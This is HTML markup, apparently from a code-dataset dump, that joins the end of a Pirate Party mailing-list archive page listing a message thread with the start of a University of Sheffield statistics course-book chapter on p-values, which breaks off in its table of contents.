href="msg00610.html">[Partido Pirata] Res: Reunião do Parti...</a></span> <span class="sender italic">Raphael S. Lapa</span></li> <li class="icons-email"><span class="subject"><a href="msg00611.html">Re: [Partido Pirata] Res: Reunião do Pa...</a></span> <span class="sender italic">Simone Vollbrecht</span></li> <li class="icons-email"><span class="subject"><a href="msg00617.html">Re: [Partido Pirata] Res: Reunião do Pa...</a></span> <span class="sender italic">Alessandro Delgado</span></li> <li class="icons-email"><span class="subject"><a href="msg00620.html">Re: [Partido Pirata] Res: Reunião do Pa...</a></span> <span class="sender italic">Felipe Barros</span></li> <li class="icons-email"><span class="subject"><a href="msg00738.html">Re: [Partido Pirata] Res: Reunião do Pa...</a></span> <span class="sender italic">Diogo Leal</span></li> <li class="icons-email"><span class="subject"><a href="msg00739.html">Re: [Partido Pirata] Res: Reunião do Pa...</a></span> <span class="sender italic">Arteiro Marcial</span></li> <li class="icons-email"><span class="subject"><a href="msg00744.html">Re: [Partido Pirata] Res: Reunião do Pa...</a></span> <span class="sender italic">Igor Thiago</span></li> <li class="icons-email"><span class="subject"><a href="msg00747.html">Re: [Partido Pirata] Res: Reunião do Pa...</a></span> <span class="sender italic">cinco</span></li> <li class="icons-email"><span class="subject"><a href="msg00748.html">Re: [Partido Pirata] Res: Reunião do Pa...</a></span> <span class="sender italic">Luiz Felipe</span></li> <li class="icons-email"><span class="subject"><a href="msg00750.html">Re: [Partido Pirata] Res: Reunião do Pa...</a></span> <span class="sender italic">Ricardo da Costa Lima</span></li> <li class="icons-email tSliceCur"><span class="subject">Re: [Partido Pirata] Res: Reunião do Pa...</span> <span class="sender italic">Igor Thiago</span></li> <li class="icons-email"><span class="subject"><a href="msg00752.html">Re: [Partido Pirata] Res: Reunião do Pa...</a></span> <span class="sender italic">Luiz Felipe</span></li> <li class="icons-email"><span class="subject"><a href="msg00753.html">Re: [Partido Pirata] Res: Reunião do Pa...</a></span> <span class="sender italic">Igor Thiago</span></li> <li class="icons-email"><span class="subject"><a href="msg00755.html">Re: [Partido Pirata] Res: Reunião do Pa...</a></span> <span class="sender italic">Luiz Felipe</span></li> <li class="icons-email"><span class="subject"><a href="msg00756.html">Re: [Partido Pirata] Res: Reunião do Pa...</a></span> <span class="sender italic">Luiz Felipe</span></li> <li class="icons-email"><span class="subject"><a href="msg00760.html">Re: [Partido Pirata] Res: Reunião do Pa...</a></span> <span class="sender italic">Daniel Siqueira - debatevisual.com</span></li> <li class="icons-email"><span class="subject"><a href="msg00749.html">[Partido Pirata] Res: Res: Reunião do ...</a></span> <span class="sender italic">Raphael S. Lapa</span></li> </ul> </ul> </ul> </ul> </ul> </ul> </ul> </ul> </div> <div class="overflow msgActions margintopdouble"> <div class="msgReply" > <h2> Responder a </h2> <form method="POST" action="https://www.mail-archive.com/mailto.php"> <input type="hidden" name="subject" value="Re: [Partido Pirata] Res: Reunião do Partido Pirat a"> <input type="hidden" name="msgid" value="AANLkTikH9hnLKUoFtf28-h06P2RU=HbCdW_B9G4Lm6=N@mail.gmail.com"> <input type="hidden" name="relpath" value="listapirata@listas.partidopirata.org/msg00751.html"> <input type="submit" value=" Igor Thiago "> </form> </div> </div> </div> <div class="aside" role="complementary"> <div class="logo"> <a href="https://www.mail-archive.com/"><img src="https://www.mail-archive.com/logo.png" width=247 height=88 alt="The Mail Archive"></a> </div> <form class="overflow" action="https://www.mail-archive.com/search" method="get"> <input type="hidden" name="l" value="listapirata@listas.partidopirata.org"> <label class="hidden" for="q">Search the site</label> <input class="submittext" type="text" id="q" name="q" placeholder="Pesquisar listapirata"> <input class="submitbutton" name="submit" type="image" src="https://www.mail-archive.com/submit.png" alt="Submit"> </form> <div class="nav margintop" id="nav" role="navigation"> <ul class="icons font16"> <li class="icons-home"><a href="https://www.mail-archive.com/">In&#0237;cio do Arquivo de Correio</a></li> <li class="icons-list"><a href="index.html" title="c">listapirata - Todas as mensagens</a></li> <li class="icons-about"><a href="https://www.mail-archive.com/listapirata@listas.partidopirata.org/info.html">listapirata - Acerca da lista</a></li> <li class="icons-expand"><a href="https://www.mail-archive.com/search?l=listapirata@listas.partidopirata.org&amp;q=subject:%22Re%5C%3A+%5C%5BPartido+Pirata%5C%5D%09Res%5C%3A+Reuni%C3%A3o+do+Partido+Pirat%09a%22&amp;o=newest&amp;f=1" title="e" id="e">Expandir</a></li> <li class="icons-prev"><a href="msg00750.html" title="p">Mensagem anterior</a></li> <li class="icons-next"><a href="msg00752.html" title="n">Pr&#0243;xima mensagem</a></li> </ul> </div> <div class="listlogo margintopdouble"> <a href="msg00751.html#"><img src="https://www.mail-archive.com/listapirata@listas.partidopirata.org/logo.png" alt="listapirata"></a> </div> <div class="margintopdouble"> </div> </div> </div> <div class="footer" role="contentinfo"> <ul> <li><a href="https://www.mail-archive.com/">In&#0237;cio do Arquivo de Correio</a></li> <li><a href="https://www.mail-archive.com/faq.html#newlist">Adicione a sua lista de discuss&#0227;o</a></li> <li><a href="https://www.mail-archive.com/faq.html">Perguntas Mais Frequentes</a></li> <li><a href="https://www.mail-archive.com/faq.html#support">Apoio</a></li> <li><a href="https://www.mail-archive.com/faq.html#privacy">Privacidade</a></li> <li class="darkgray">AANLkTikH9hnLKUoFtf28-h06P2RU=HbCdW_B9G4Lm6=N@mail.gmail.com</li> </ul> </div> </body> </html>
piratas/midiateca
documentos/listapirata/listapirata@listas.partidopirata.org/msg00751.html
HTML
cc0-1.0
11,050
<!DOCTYPE html> <html lang="" xml:lang=""> <head> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <title>Chapter 8 Statistical significance and p-values | APS 240: Data Analysis and Statistics with R</title> <meta name="description" content="Course book for Data Analysis and Statistics with R (APS 240) in the Department of Animal and Plant Sciences, University of Sheffield" /> <meta name="generator" content="bookdown 0.21 and GitBook 2.6.7" /> <meta property="og:title" content="Chapter 8 Statistical significance and p-values | APS 240: Data Analysis and Statistics with R" /> <meta property="og:type" content="book" /> <meta property="og:description" content="Course book for Data Analysis and Statistics with R (APS 240) in the Department of Animal and Plant Sciences, University of Sheffield" /> <meta name="github-repo" content="dzchilds/stats-for-bio" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:title" content="Chapter 8 Statistical significance and p-values | APS 240: Data Analysis and Statistics with R" /> <meta name="twitter:description" content="Course book for Data Analysis and Statistics with R (APS 240) in the Department of Animal and Plant Sciences, University of Sheffield" /> <meta name="author" content="Dylan Z. Childs, Bethan J. Hindle and Philip H. Warren" /> <meta name="date" content="2021-01-14" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <meta name="apple-mobile-web-app-capable" content="yes" /> <meta name="apple-mobile-web-app-status-bar-style" content="black" /> <link rel="prev" href="sampling-error.html"/> <link rel="next" href="statistical-comparisons.html"/> <script src="libs/header-attrs-2.5/header-attrs.js"></script> <script src="libs/jquery-2.2.3/jquery.min.js"></script> <link href="libs/gitbook-2.6.7/css/style.css" rel="stylesheet" /> <link href="libs/gitbook-2.6.7/css/plugin-table.css" rel="stylesheet" /> <link href="libs/gitbook-2.6.7/css/plugin-bookdown.css" rel="stylesheet" /> <link href="libs/gitbook-2.6.7/css/plugin-highlight.css" rel="stylesheet" /> <link href="libs/gitbook-2.6.7/css/plugin-search.css" rel="stylesheet" /> <link href="libs/gitbook-2.6.7/css/plugin-fontsettings.css" rel="stylesheet" /> <link href="libs/gitbook-2.6.7/css/plugin-clipboard.css" rel="stylesheet" /> <link href="libs/anchor-sections-1.0/anchor-sections.css" rel="stylesheet" /> <script src="libs/anchor-sections-1.0/anchor-sections.js"></script> <style type="text/css"> .warning-box { border: 3px solid #e60000; margin: 25px; padding: 10px 10px 5px 10px; border-radius: 6px 6px 6px 6px; } .advanced-box { border: 3px solid #268bd2; margin: 25px; padding: 10px 10px 5px 10px; border-radius: 6px 6px 6px 6px; } .do-something { border: 3px solid #803e00; margin: 25px; padding: 10px 10px 5px 10px; border-radius: 6px 6px 6px 6px; } </style> <style type="text/css"> pre > code.sourceCode { white-space: pre; position: relative; } pre > code.sourceCode > span { display: inline-block; line-height: 1.25; } pre > code.sourceCode > span:empty { height: 1.2em; } code.sourceCode > span { color: inherit; text-decoration: inherit; } pre.sourceCode { margin: 0; } @media screen { div.sourceCode { overflow: auto; } } @media print { pre > code.sourceCode { white-space: pre-wrap; } pre > code.sourceCode > span { text-indent: -5em; padding-left: 5em; } } pre.numberSource code { counter-reset: source-line 0; } pre.numberSource code > span { position: relative; left: -4em; counter-increment: source-line; } pre.numberSource code > span > a:first-child::before { content: counter(source-line); position: relative; left: -1em; text-align: right; vertical-align: baseline; border: none; display: inline-block; -webkit-touch-callout: none; -webkit-user-select: none; -khtml-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; padding: 0 4px; width: 4em; color: #aaaaaa; } pre.numberSource { margin-left: 3em; border-left: 1px solid #aaaaaa; padding-left: 4px; } div.sourceCode { } @media screen { pre > code.sourceCode > span > a:first-child::before { text-decoration: underline; } } code span.al { color: #ff0000; font-weight: bold; } /* Alert */ code span.an { color: #60a0b0; font-weight: bold; font-style: italic; } /* Annotation */ code span.at { color: #7d9029; } /* Attribute */ code span.bn { color: #40a070; } /* BaseN */ code span.bu { } /* BuiltIn */ code span.cf { color: #007020; font-weight: bold; } /* ControlFlow */ code span.ch { color: #4070a0; } /* Char */ code span.cn { color: #880000; } /* Constant */ code span.co { color: #60a0b0; font-style: italic; } /* Comment */ code span.cv { color: #60a0b0; font-weight: bold; font-style: italic; } /* CommentVar */ code span.do { color: #ba2121; font-style: italic; } /* Documentation */ code span.dt { color: #902000; } /* DataType */ code span.dv { color: #40a070; } /* DecVal */ code span.er { color: #ff0000; font-weight: bold; } /* Error */ code span.ex { } /* Extension */ code span.fl { color: #40a070; } /* Float */ code span.fu { color: #06287e; } /* Function */ code span.im { } /* Import */ code span.in { color: #60a0b0; font-weight: bold; font-style: italic; } /* Information */ code span.kw { color: #007020; font-weight: bold; } /* Keyword */ code span.op { color: #666666; } /* Operator */ code span.ot { color: #007020; } /* Other */ code span.pp { color: #bc7a00; } /* Preprocessor */ code span.sc { color: #4070a0; } /* SpecialChar */ code span.ss { color: #bb6688; } /* SpecialString */ code span.st { color: #4070a0; } /* String */ code span.va { color: #19177c; } /* Variable */ code span.vs { color: #4070a0; } /* VerbatimString */ code span.wa { color: #60a0b0; font-weight: bold; font-style: italic; } /* Warning */ </style> <link rel="stylesheet" href="style.css" type="text/css" /> </head> <body> <div class="book without-animation with-summary font-size-2 font-family-1" data-basepath="."> <div class="book-summary"> <nav role="navigation"> <ul class="summary"> <li><a href="./">APS 240</a></li> <li class="divider"></li> <li class="chapter" data-level="1" data-path="index.html"><a href="index.html"><i class="fa fa-check"></i><b>1</b> Course information and overview</a> <ul> <li class="chapter" data-level="1.1" data-path="index.html"><a href="index.html#why-data-analysis"><i class="fa fa-check"></i><b>1.1</b> Why do a data analysis course?</a></li> <li class="chapter" data-level="1.2" data-path="index.html"><a href="index.html#overview"><i class="fa fa-check"></i><b>1.2</b> Course overview</a> <ul> <li class="chapter" data-level="1.2.1" data-path="index.html"><a href="index.html#aims"><i class="fa fa-check"></i><b>1.2.1</b> Aims</a></li> <li class="chapter" data-level="1.2.2" data-path="index.html"><a href="index.html#objectives"><i class="fa fa-check"></i><b>1.2.2</b> Objectives</a></li> <li class="chapter" data-level="1.2.3" data-path="index.html"><a href="index.html#assumed-background"><i class="fa fa-check"></i><b>1.2.3</b> Assumed background</a></li> <li class="chapter" data-level="1.2.4" data-path="index.html"><a href="index.html#methods"><i class="fa fa-check"></i><b>1.2.4</b> Methods</a></li> <li class="chapter" data-level="1.2.5" data-path="index.html"><a href="index.html#what-do-you-need-to-learn"><i class="fa fa-check"></i><b>1.2.5</b> What do you need to learn?</a></li> <li class="chapter" data-level="1.2.6" data-path="index.html"><a href="index.html#what-is-required-of-you"><i class="fa fa-check"></i><b>1.2.6</b> What is required of you?</a></li> </ul></li> <li class="chapter" data-level="1.3" data-path="index.html"><a href="index.html#how-to-use-the-teaching-material"><i class="fa fa-check"></i><b>1.3</b> How to use the teaching material</a> <ul> <li class="chapter" data-level="1.3.1" data-path="index.html"><a href="index.html#printed-material"><i class="fa fa-check"></i><b>1.3.1</b> The online course book</a></li> <li class="chapter" data-level="1.3.2" data-path="index.html"><a href="index.html#how-to-make-best-use-of-it"><i class="fa fa-check"></i><b>1.3.2</b> How to make best use of the teaching material</a></li> <li class="chapter" data-level="1.3.3" data-path="index.html"><a href="index.html#conventions"><i class="fa fa-check"></i><b>1.3.3</b> Conventions used in the course material</a></li> <li class="chapter" data-level="1.3.4" data-path="index.html"><a href="index.html#feedback"><i class="fa fa-check"></i><b>1.3.4</b> Feedback</a></li> <li class="chapter" data-level="1.3.5" data-path="index.html"><a href="index.html#overall"><i class="fa fa-check"></i><b>1.3.5</b> Overall…</a></li> </ul></li> <li class="chapter" data-level="1.4" data-path="index.html"><a href="index.html#health-and-safety"><i class="fa fa-check"></i><b>1.4</b> Health and safety using display screen equipment</a></li> </ul></li> <li class="chapter" data-level="2" data-path="expected-learning.html"><a href="expected-learning.html"><i class="fa fa-check"></i><b>2</b> Expected learning outcomes</a> <ul> <li class="chapter" data-level="2.1" data-path="expected-learning.html"><a href="expected-learning.html#collecting-and-using-data"><i class="fa fa-check"></i><b>2.1</b> Collecting and using data</a></li> <li class="chapter" data-level="2.2" data-path="expected-learning.html"><a href="expected-learning.html#statistical-concepts"><i class="fa fa-check"></i><b>2.2</b> Statistical Concepts</a></li> <li class="chapter" data-level="2.3" data-path="expected-learning.html"><a href="expected-learning.html#simple-parametric-statistics"><i class="fa fa-check"></i><b>2.3</b> Simple parametric statistics</a></li> <li class="chapter" data-level="2.4" data-path="expected-learning.html"><a href="expected-learning.html#regression-and-anova"><i class="fa fa-check"></i><b>2.4</b> Regression and ANOVA</a></li> <li class="chapter" data-level="2.5" data-path="expected-learning.html"><a href="expected-learning.html#doing-more-with-models"><i class="fa fa-check"></i><b>2.5</b> Doing more with models</a></li> <li class="chapter" data-level="2.6" data-path="expected-learning.html"><a href="expected-learning.html#experimental-design"><i class="fa fa-check"></i><b>2.6</b> Experimental design</a></li> <li class="chapter" data-level="2.7" data-path="expected-learning.html"><a href="expected-learning.html#beyond-simple-models"><i class="fa fa-check"></i><b>2.7</b> Beyond simple models</a></li> <li class="chapter" data-level="2.8" data-path="expected-learning.html"><a href="expected-learning.html#frequency-data-and-non-parameteric-tests"><i class="fa fa-check"></i><b>2.8</b> Frequency data and non-parameteric tests</a></li> </ul></li> <li class="chapter" data-level="3" data-path="prerequisites.html"><a href="prerequisites.html"><i class="fa fa-check"></i><b>3</b> Programming prerequisites</a> <ul> <li class="chapter" data-level="3.1" data-path="prerequisites.html"><a href="prerequisites.html#starting-a-learnr-tutorial"><i class="fa fa-check"></i><b>3.1</b> Starting a <strong>learnr</strong> tutorial</a></li> <li class="chapter" data-level="3.2" data-path="prerequisites.html"><a href="prerequisites.html#using-packages"><i class="fa fa-check"></i><b>3.2</b> Using packages</a></li> <li class="chapter" data-level="3.3" data-path="prerequisites.html"><a href="prerequisites.html#reading-data-into-r"><i class="fa fa-check"></i><b>3.3</b> Reading data into R</a></li> </ul></li> <li class="part"><span><b>I Collecting and Using Data</b></span></li> <li class="chapter" data-level="4" data-path="scientific-process.html"><a href="scientific-process.html"><i class="fa fa-check"></i><b>4</b> The scientific process</a> <ul> <li class="chapter" data-level="4.1" data-path="scientific-process.html"><a href="scientific-process.html#stages-scientific-process"><i class="fa fa-check"></i><b>4.1</b> Stages in the scientific process</a> <ul> <li class="chapter" data-level="4.1.1" data-path="scientific-process.html"><a href="scientific-process.html#stages-observations"><i class="fa fa-check"></i><b>4.1.1</b> Observations</a></li> <li class="chapter" data-level="4.1.2" data-path="scientific-process.html"><a href="scientific-process.html#stages-questions"><i class="fa fa-check"></i><b>4.1.2</b> Questions</a></li> <li class="chapter" data-level="4.1.3" data-path="scientific-process.html"><a href="scientific-process.html#stages-hypotheses"><i class="fa fa-check"></i><b>4.1.3</b> Hypotheses</a></li> <li class="chapter" data-level="4.1.4" data-path="scientific-process.html"><a href="scientific-process.html#stages-predictions"><i class="fa fa-check"></i><b>4.1.4</b> Predictions</a></li> </ul></li> <li class="chapter" data-level="4.2" data-path="scientific-process.html"><a href="scientific-process.html#an-example"><i class="fa fa-check"></i><b>4.2</b> An example</a></li> <li class="chapter" data-level="4.3" data-path="scientific-process.html"><a href="scientific-process.html#hypothesis-testing"><i class="fa fa-check"></i><b>4.3</b> Hypothesis testing</a></li> <li class="chapter" data-level="4.4" data-path="scientific-process.html"><a href="scientific-process.html#are-we-sure"><i class="fa fa-check"></i><b>4.4</b> Don’t we ever know anything for sure?</a></li> </ul></li> <li class="chapter" data-level="5" data-path="data-variables.html"><a href="data-variables.html"><i class="fa fa-check"></i><b>5</b> Data and variables</a> <ul> <li class="chapter" data-level="5.1" data-path="data-variables.html"><a href="data-variables.html#observations-on-material-and-obvious-things"><i class="fa fa-check"></i><b>5.1</b> “Observations on material and obvious things”</a></li> <li class="chapter" data-level="5.2" data-path="data-variables.html"><a href="data-variables.html#var-types"><i class="fa fa-check"></i><b>5.2</b> Revision: Types of variable</a> <ul> <li class="chapter" data-level="5.2.1" data-path="data-variables.html"><a href="data-variables.html#nominal-categorical-variables"><i class="fa fa-check"></i><b>5.2.1</b> Nominal (categorical) variables</a></li> <li class="chapter" data-level="5.2.2" data-path="data-variables.html"><a href="data-variables.html#ordinal-categorical-data"><i class="fa fa-check"></i><b>5.2.2</b> Ordinal (categorical) data</a></li> <li class="chapter" data-level="5.2.3" data-path="data-variables.html"><a href="data-variables.html#ratio-scale-numeric-variables"><i class="fa fa-check"></i><b>5.2.3</b> Ratio scale (numeric) variables</a></li> <li class="chapter" data-level="5.2.4" data-path="data-variables.html"><a href="data-variables.html#interval-scale-numeric-variables"><i class="fa fa-check"></i><b>5.2.4</b> Interval scale (numeric) variables</a></li> <li class="chapter" data-level="5.2.5" data-path="data-variables.html"><a href="data-variables.html#why-does-the-distinction-matter"><i class="fa fa-check"></i><b>5.2.5</b> Why does the distinction matter?</a></li> <li class="chapter" data-level="5.2.6" data-path="data-variables.html"><a href="data-variables.html#which-is-best"><i class="fa fa-check"></i><b>5.2.6</b> Which is best?</a></li> </ul></li> <li class="chapter" data-level="5.3" data-path="data-variables.html"><a href="data-variables.html#accuracy-precision"><i class="fa fa-check"></i><b>5.3</b> Accuracy and precision</a> <ul> <li class="chapter" data-level="5.3.1" data-path="data-variables.html"><a href="data-variables.html#what-do-they-mean"><i class="fa fa-check"></i><b>5.3.1</b> What do they mean?</a></li> <li class="chapter" data-level="5.3.2" data-path="data-variables.html"><a href="data-variables.html#implied-precision-significant-figures"><i class="fa fa-check"></i><b>5.3.2</b> Implied precision – significant figures</a></li> <li class="chapter" data-level="5.3.3" data-path="data-variables.html"><a href="data-variables.html#how-precise-should-measurements-be"><i class="fa fa-check"></i><b>5.3.3</b> How precise should measurements be?</a></li> <li class="chapter" data-level="5.3.4" data-path="data-variables.html"><a href="data-variables.html#error-bias-and-prejudice"><i class="fa fa-check"></i><b>5.3.4</b> Error, bias and prejudice</a></li> </ul></li> </ul></li> <li class="chapter" data-level="6" data-path="learning-from-data.html"><a href="learning-from-data.html"><i class="fa fa-check"></i><b>6</b> Learning from data</a> <ul> <li class="chapter" data-level="6.1" data-path="learning-from-data.html"><a href="learning-from-data.html#populations"><i class="fa fa-check"></i><b>6.1</b> Populations</a></li> <li class="chapter" data-level="6.2" data-path="learning-from-data.html"><a href="learning-from-data.html#learning-about-populations"><i class="fa fa-check"></i><b>6.2</b> Learning about populations</a></li> <li class="chapter" data-level="6.3" data-path="learning-from-data.html"><a href="learning-from-data.html#morph-example"><i class="fa fa-check"></i><b>6.3</b> A simple example</a></li> <li class="chapter" data-level="6.4" data-path="learning-from-data.html"><a href="learning-from-data.html#now-what"><i class="fa fa-check"></i><b>6.4</b> Now what?</a></li> </ul></li> <li class="part"><span><b>II Statistical Concepts</b></span></li> <li class="chapter" data-level="7" data-path="sampling-error.html"><a href="sampling-error.html"><i class="fa fa-check"></i><b>7</b> Sampling error</a> <ul> <li class="chapter" data-level="7.1" data-path="sampling-error.html"><a href="sampling-error.html#sampling-error-1"><i class="fa fa-check"></i><b>7.1</b> Sampling error</a></li> <li class="chapter" data-level="7.2" data-path="sampling-error.html"><a href="sampling-error.html#sampling-distributions"><i class="fa fa-check"></i><b>7.2</b> Sampling distributions</a></li> <li class="chapter" data-level="7.3" data-path="sampling-error.html"><a href="sampling-error.html#the-effect-of-sample-size"><i class="fa fa-check"></i><b>7.3</b> The effect of sample size</a></li> <li class="chapter" data-level="7.4" data-path="sampling-error.html"><a href="sampling-error.html#the-standard-error"><i class="fa fa-check"></i><b>7.4</b> The standard error</a></li> <li class="chapter" data-level="7.5" data-path="sampling-error.html"><a href="sampling-error.html#what-is-the-point-of-all-this"><i class="fa fa-check"></i><b>7.5</b> What is the point of all this?</a></li> </ul></li> <li class="chapter" data-level="8" data-path="statistical-significance-and-p-values.html"><a href="statistical-significance-and-p-values.html"><i class="fa fa-check"></i><b>8</b> Statistical significance and <em>p</em>-values</a> <ul> <li class="chapter" data-level="8.1" data-path="statistical-significance-and-p-values.html"><a href="statistical-significance-and-p-values.html#bootstrap"><i class="fa fa-check"></i><b>8.1</b> Estimating a sampling distribution</a> <ul> <li class="chapter" data-level="8.1.1" data-path="statistical-significance-and-p-values.html"><a href="statistical-significance-and-p-values.html#bootstrap-overview"><i class="fa fa-check"></i><b>8.1.1</b> Overview of bootstrapping</a></li> <li class="chapter" data-level="8.1.2" data-path="statistical-significance-and-p-values.html"><a href="statistical-significance-and-p-values.html#doing-it-for-real"><i class="fa fa-check"></i><b>8.1.2</b> Doing it for real</a></li> </ul></li> <li class="chapter" data-level="8.2" data-path="statistical-significance-and-p-values.html"><a href="statistical-significance-and-p-values.html#statistical-significance"><i class="fa fa-check"></i><b>8.2</b> Statistical significance</a> <ul> <li class="chapter" data-level="" data-path="statistical-significance-and-p-values.html"><a href="statistical-significance-and-p-values.html#carrying-out-the-assessment"><i class="fa fa-check"></i>Carrying out the assessment</a></li> <li class="chapter" data-level="" data-path="statistical-significance-and-p-values.html"><a href="statistical-significance-and-p-values.html#interpreting-the-p-value"><i class="fa fa-check"></i>Interpreting the p-value</a></li> </ul></li> <li class="chapter" data-level="8.3" data-path="statistical-significance-and-p-values.html"><a href="statistical-significance-and-p-values.html#concluding-remarks"><i class="fa fa-check"></i><b>8.3</b> Concluding remarks</a></li> </ul></li> <li class="chapter" data-level="9" data-path="statistical-comparisons.html"><a href="statistical-comparisons.html"><i class="fa fa-check"></i><b>9</b> Statistical comparisons</a> <ul> <li class="chapter" data-level="9.1" data-path="statistical-comparisons.html"><a href="statistical-comparisons.html#making-comparisons"><i class="fa fa-check"></i><b>9.1</b> Making comparisons</a> <ul> <li class="chapter" data-level="9.1.1" data-path="statistical-comparisons.html"><a href="statistical-comparisons.html#morph-weights-eg"><i class="fa fa-check"></i><b>9.1.1</b> A new example</a></li> <li class="chapter" data-level="9.1.2" data-path="statistical-comparisons.html"><a href="statistical-comparisons.html#examine-the-data"><i class="fa fa-check"></i><b>9.1.2</b> Examine the data</a></li> </ul></li> <li class="chapter" data-level="9.2" data-path="statistical-comparisons.html"><a href="statistical-comparisons.html#constructing-a-test"><i class="fa fa-check"></i><b>9.2</b> Constructing a test</a> <ul> <li class="chapter" data-level="9.2.1" data-path="statistical-comparisons.html"><a href="statistical-comparisons.html#permutation-tests"><i class="fa fa-check"></i><b>9.2.1</b> Permutation tests</a></li> <li class="chapter" data-level="9.2.2" data-path="statistical-comparisons.html"><a href="statistical-comparisons.html#carrying-out-a-permutation-test"><i class="fa fa-check"></i><b>9.2.2</b> Carrying out a permutation test</a></li> <li><a href="statistical-comparisons.html#calculating-the-p-value">Calculating the <em>p</em>-value</a></li> </ul></li> <li class="chapter" data-level="9.3" data-path="statistical-comparisons.html"><a href="statistical-comparisons.html#what-have-we-learned"><i class="fa fa-check"></i><b>9.3</b> What have we learned?</a></li> </ul></li> <li class="chapter" data-level="10" data-path="hypotheses-and-p-values.html"><a href="hypotheses-and-p-values.html"><i class="fa fa-check"></i><b>10</b> Hypotheses and <em>p</em>-values</a> <ul> <li class="chapter" data-level="10.1" data-path="hypotheses-and-p-values.html"><a href="hypotheses-and-p-values.html#a-few-words-about-the-null-hypothesis"><i class="fa fa-check"></i><b>10.1</b> A few words about the null hypothesis</a> <ul> <li class="chapter" data-level="10.1.1" data-path="hypotheses-and-p-values.html"><a href="hypotheses-and-p-values.html#hypotheses-and-null-hypotheses"><i class="fa fa-check"></i><b>10.1.1</b> Hypotheses and null hypotheses</a></li> <li class="chapter" data-level="10.1.2" data-path="hypotheses-and-p-values.html"><a href="hypotheses-and-p-values.html#report-the-null-hypothesis"><i class="fa fa-check"></i><b>10.1.2</b> Report the null hypothesis?</a></li> </ul></li> <li class="chapter" data-level="10.2" data-path="hypotheses-and-p-values.html"><a href="hypotheses-and-p-values.html#interpreting-and-reporting-p-values"><i class="fa fa-check"></i><b>10.2</b> Interpreting and reporting <em>p</em>-values</a> <ul> <li class="chapter" data-level="10.2.1" data-path="hypotheses-and-p-values.html"><a href="hypotheses-and-p-values.html#careful-with-those-p-values"><i class="fa fa-check"></i><b>10.2.1</b> Careful with those <em>p</em>-values</a></li> <li class="chapter" data-level="10.2.2" data-path="hypotheses-and-p-values.html"><a href="hypotheses-and-p-values.html#presenting-p-values"><i class="fa fa-check"></i><b>10.2.2</b> Presenting <em>p</em>-values</a></li> </ul></li> <li class="chapter" data-level="10.3" data-path="hypotheses-and-p-values.html"><a href="hypotheses-and-p-values.html#biological-vs.-statistical-significance"><i class="fa fa-check"></i><b>10.3</b> Biological vs. statistical significance</a></li> </ul></li> <li class="part"><span><b>III Simple Statistics</b></span></li> <li class="chapter" data-level="11" data-path="parametric-statistics.html"><a href="parametric-statistics.html"><i class="fa fa-check"></i><b>11</b> Parametric statistics</a> <ul> <li class="chapter" data-level="11.1" data-path="parametric-statistics.html"><a href="parametric-statistics.html#introduction"><i class="fa fa-check"></i><b>11.1</b> Introduction</a></li> <li class="chapter" data-level="11.2" data-path="parametric-statistics.html"><a href="parametric-statistics.html#math-models"><i class="fa fa-check"></i><b>11.2</b> Mathematical models</a></li> <li class="chapter" data-level="11.3" data-path="parametric-statistics.html"><a href="parametric-statistics.html#parametric-stats"><i class="fa fa-check"></i><b>11.3</b> The normal distribution</a> <ul> <li class="chapter" data-level="11.3.1" data-path="parametric-statistics.html"><a href="parametric-statistics.html#standard-error-of-the-mean"><i class="fa fa-check"></i><b>11.3.1</b> Standard error of the mean</a></li> <li class="chapter" data-level="11.3.2" data-path="parametric-statistics.html"><a href="parametric-statistics.html#the-t-distribution"><i class="fa fa-check"></i><b>11.3.2</b> The <em>t</em> distribution</a></li> </ul></li> </ul></li> <li class="chapter" data-level="12" data-path="one-sample-t-tests.html"><a href="one-sample-t-tests.html"><i class="fa fa-check"></i><b>12</b> One sample <em>t</em>-tests</a> <ul> <li class="chapter" data-level="12.1" data-path="one-sample-t-tests.html"><a href="one-sample-t-tests.html#when-do-we-use-one-sample-t-test"><i class="fa fa-check"></i><b>12.1</b> When do we use one-sample <em>t</em>-test?</a></li> <li class="chapter" data-level="12.2" data-path="one-sample-t-tests.html"><a href="one-sample-t-tests.html#how-does-the-one-sample-t-test-work"><i class="fa fa-check"></i><b>12.2</b> How does the one-sample <em>t</em>-test work?</a> <ul> <li class="chapter" data-level="12.2.1" data-path="one-sample-t-tests.html"><a href="one-sample-t-tests.html#assumptions-of-the-one-sample-t-test"><i class="fa fa-check"></i><b>12.2.1</b> Assumptions of the one-sample <em>t</em>-test</a></li> <li class="chapter" data-level="12.2.2" data-path="one-sample-t-tests.html"><a href="one-sample-t-tests.html#evaluating-the-assumptions"><i class="fa fa-check"></i><b>12.2.2</b> Evaluating the assumptions</a></li> </ul></li> <li class="chapter" data-level="12.3" data-path="one-sample-t-tests.html"><a href="one-sample-t-tests.html#carrying-out-a-one-sample-t-test-in-r"><i class="fa fa-check"></i><b>12.3</b> Carrying out a one-sample <em>t</em>-test in R</a> <ul> <li class="chapter" data-level="12.3.1" data-path="one-sample-t-tests.html"><a href="one-sample-t-tests.html#visualising-the-data-and-checking-the-assumptions"><i class="fa fa-check"></i><b>12.3.1</b> Visualising the data and checking the assumptions</a></li> <li class="chapter" data-level="12.3.2" data-path="one-sample-t-tests.html"><a href="one-sample-t-tests.html#carrying-out-the-test"><i class="fa fa-check"></i><b>12.3.2</b> Carrying out the test</a></li> <li class="chapter" data-level="12.3.3" data-path="one-sample-t-tests.html"><a href="one-sample-t-tests.html#summarising-the-result"><i class="fa fa-check"></i><b>12.3.3</b> Summarising the result</a></li> </ul></li> </ul></li> <li class="chapter" data-level="13" data-path="two-sample-t-test.html"><a href="two-sample-t-test.html"><i class="fa fa-check"></i><b>13</b> Two-sample <em>t</em>-test</a> <ul> <li class="chapter" data-level="13.1" data-path="two-sample-t-test.html"><a href="two-sample-t-test.html#when-do-we-use-a-two-sample-t-test"><i class="fa fa-check"></i><b>13.1</b> When do we use a two-sample <em>t</em>-test?</a></li> <li class="chapter" data-level="13.2" data-path="two-sample-t-test.html"><a href="two-sample-t-test.html#how-does-the-two-sample-t-test-work"><i class="fa fa-check"></i><b>13.2</b> How does the two-sample <em>t</em>-test work?</a> <ul> <li class="chapter" data-level="13.2.1" data-path="two-sample-t-test.html"><a href="two-sample-t-test.html#assumptions-of-the-two-sample-t-test"><i class="fa fa-check"></i><b>13.2.1</b> Assumptions of the two-sample <em>t</em>-test</a></li> <li class="chapter" data-level="13.2.2" data-path="two-sample-t-test.html"><a 